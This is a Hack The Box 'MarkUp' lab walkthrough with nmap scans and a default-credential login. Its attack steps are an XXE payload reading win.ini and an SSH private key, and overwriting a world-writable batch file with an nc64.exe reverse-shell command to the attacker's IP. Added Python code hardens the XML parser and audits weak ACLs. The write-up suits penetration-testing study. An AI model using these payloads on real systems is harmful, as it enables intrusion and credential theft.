HTB MarkUp
For this box I am following the provided writeup.
IP=10.129.23.18
myIP=10.10.15.113
nmap scans
nmap -sCV $IP -oN nmap-markup.txt
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9fa0f78cc6e2a4bd718768823e5db79f (RSA)
|   256 907d96a96e9e4d4094e7bb55ebb30b97 (ECDSA)
|_  256 f910eb76d46d4f3e17f393d60b8c4b81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: MegaShopping
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
sudo nmap -sC -A -Pn $IP
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9fa0f78cc6e2a4bd718768823e5db79f (RSA)
|   256 907d96a96e9e4d4094e7bb55ebb30b97 (ECDSA)
|_  256 f910eb76d46d4f3e17f393d60b8c4b81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: MegaShopping
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   75.99 ms 10.10.14.1
2   76.22 ms 10.129.23.18
Web Page
Defaulted to a login page; tried U: admin P: password, and it worked!
Looking into the order page; I will examine it with Burp to see what is happening.
Also ran gobuster dir -u http://$IP -w common.txt: only /index.php was 200, most were 403 or 503, with two 301s (/images).
When I press Ctrl+U it shows me the source of index.php for every page, but using the inspector I can find the username; we will try the user Daniel.
Burp
POST /process.php HTTP/1.1
Host: 10.129.23.18
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.129.23.18/services.php
Content-Type: text/xml
Content-Length: 121
Origin: http://10.129.23.18
DNT: 1
Connection: close
Cookie: PHPSESSID=oc1pddf95a38lmus3jrn2pj155
<order>
<quantity>
1
</quantity>
<item>
Home Appliances
</item>
<address>
this is a test
</address>
</order>
Let's try XXE (XML External Entity). Let's edit the request to:
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>
1
</quantity>
<item>
&test;
</item>
<address>
this is a test
</address>
</order>
Submit, and we get: Your order for ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [Ports] COM1:=9600,n,8,1 has been processed
This shows that the win.ini file was returned in the response, so we know it is vulnerable.
Edit the attack to:
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
Response: the "Your order for ... has been processed" message now contains the full contents of daniel's OpenSSH private key.
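Added example (mine, not code from the writeup or the MegaShopping app): the fix and the detection for the XXE above in Python, assuming the order body is parsed server-side and that request bodies are available from a web or WAF log. The parser refuses any DTD before parsing, and the detector pulls SYSTEM entity declarations out of request bodies; both sample bodies are constructed from the requests shown above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed test data: the legitimate order body and the XXE probe from the
# writeup, reproduced here as strings (not captured live traffic).
ORDER_OK = ("<order><quantity>1</quantity><item>Home Appliances</item>"
            "<address>this is a test</address></order>")
ORDER_XXE = ("<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>"
             "<order><quantity>1</quantity><item>&test;</item>"
             "<address>this is a test</address></order>")

# Orders never need a DTD, so any DOCTYPE/ENTITY is hostile. Rejecting it
# blocks external entities (XXE) and entity-expansion DoS in one check.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# External general entity declaration: captures the entity name and its URI.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<name>[\w.-]+)\s+SYSTEM\s+(?P<q>['\"])(?P<uri>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL)


def parse_order(xml_text):
    """Hardened order parser: refuse DTDs, then read quantity/item/address."""
    if DTD_RE.search(xml_text):
        raise ValueError("DTD or entity declaration not allowed in order XML")
    # stdlib ElementTree does not resolve external entities itself, but the
    # DTD check above is the explicit, parser-independent control.
    root = ET.fromstring(xml_text)
    if root.tag != "order":
        raise ValueError("unexpected root element %r" % root.tag)
    return {child.tag: (child.text or "").strip() for child in root}


def is_rejected(xml_text):
    """True when parse_order refuses the body (e.g. the XXE probe above)."""
    try:
        parse_order(xml_text)
    except ValueError:
        return True
    return False


def find_external_entities(body):
    """Detection side: (name, uri) for each SYSTEM entity declared in a
    request body, e.g. from a log of POST /process.php bodies."""
    return [(m.group("name"), m.group("uri")) for m in ENTITY_RE.finditer(body)]
```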
Now we make an SSH key file from it.
Next, try SSH.
ssh
Make the key file:
$ touch id_rsa
$ gedit id_rsa    (paste the key and save)
$ chmod 400 id_rsa
$ ls -al id_rsa
-r-------- 1 jmk jmk 2602 May 19 15:45 id_rsa
Then use it:
$ ssh -i id_rsa daniel@$IP
daniel@MARKUP C:\Users\daniel>
Move to the Desktop and find user.txt:
daniel@MARKUP C:\Users\daniel\Desktop>type user.txt
032d2fc8952a8c24e39c8f0ee9918ef7
whoami /priv

PRIVILEGES INFORMATION

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Now moving on.
daniel@MARKUP C:\Log-Management>type job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

daniel@MARKUP C:\Log-Management>icacls job.bat
job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
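Added example (mine, not from the writeup): a Python audit that parses icacls output like the listing above and flags ACEs granting F, M or W to broad principals such as BUILTIN\Users, the misconfiguration that makes job.bat exploitable. It assumes icacls' usual layout (a file's first ACE on the line with its name, later ACEs indented); the sample is the listing above plus a constructed second file with sane rights for contrast.

```python
import re

# Constructed sample: the icacls listing for job.bat from the writeup, plus a
# made-up second file (good.bat) with sane permissions for contrast.
ICACLS_OUTPUT = r"""job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)
C:\Log-Management\good.bat NT AUTHORITY\SYSTEM:(F)
                           BUILTIN\Administrators:(F)
                           BUILTIN\Users:(RX)

Successfully processed 2 files; Failed processing 0 files
"""

# Groups every low-privileged account on the box is a member of.
BROAD_PRINCIPALS = {r"BUILTIN\Users", "Everyone",
                    r"NT AUTHORITY\Authenticated Users", r"NT AUTHORITY\INTERACTIVE"}
# Simple rights that allow changing a file's contents (full, modify, write).
WRITE_RIGHTS = {"F", "M", "W"}

# One ACE at the end of a line: optional "DOMAIN\" prefix, principal name,
# then "(flag)(flag)...". Whatever precedes it on the line is the file name.
ACE_RE = re.compile(
    r"(?P<who>(?:[A-Z][A-Z ]*\\)?[^\s:\\(][^:\\()]*):(?P<flags>(?:\([^)]*\))+)\s*$")


def weak_aces(icacls_text):
    """Return (file, principal, rights) for each ACE that lets a broad
    principal modify the file, in the order icacls printed them."""
    findings, current = [], None
    for line in icacls_text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue                      # blank line or the summary line
        prefix = line[:m.start()].strip()
        if prefix:                        # a file's first ACE carries its name
            current = prefix
        flags = re.findall(r"\(([^)]*)\)", m.group("flags"))
        if "DENY" in flags:
            continue                      # deny ACEs remove rights, never grant
        rights = {r for f in flags for r in f.split(",")}   # "(RX,W)" -> RX, W
        granted = rights & WRITE_RIGHTS
        if m.group("who") in BROAD_PRINCIPALS and granted:
            findings.append((current, m.group("who"), ",".join(sorted(granted))))
    return findings
```

Run over the listing it reports only the explicit BUILTIN\Users:(F) on job.bat; the inherited (RX) entry and good.bat are clean.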
Used PowerShell to list processes; wevtutil.exe, which job.bat calls, shows up running:
PS C:\Log-Management> ps

Handles NPM(K) PM(K) WS(K) CPU(s) Id   SI ProcessName
     72      5  2212  3800        3684  1 cmd
     87      6  3580  5000   0.06 3884  0 cmd
    ...
    361     22  9160 20984        1744  0 vmtoolsd
    201     16  4760 13624        3972  1 vmtoolsd
     84      5   928  4032        2456  1 wevtutil
    170     11  1440  6840         496  0 wininit
    257     12  2528 11308         580  1 winlogon
    311     15  7468 16496        2976  0 WmiPrvSE
So we will now upload nc64.exe. We get it with wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe, then serve it with python3 -m http.server.
On the MarkUp box (PowerShell): wget http://10.10.15.113:8000/nc64.exe -outfile nc64.exe
Then hook it into job.bat (the script that runs wevtutil.exe) by overwriting it:
echo C:\Log-Management\nc64.exe -e cmd.exe {your_IP} {port} > C:\Log-Management\job.bat
daniel@MARKUP C:\Log-Management>echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.15.113 4444 > C:\Log-Management\job.bat
Then listen with nc -lvnp 4444.
C:\Users\Administrator\Desktop>type root.txt
f574a3e7650cebd8c39784299cb570f8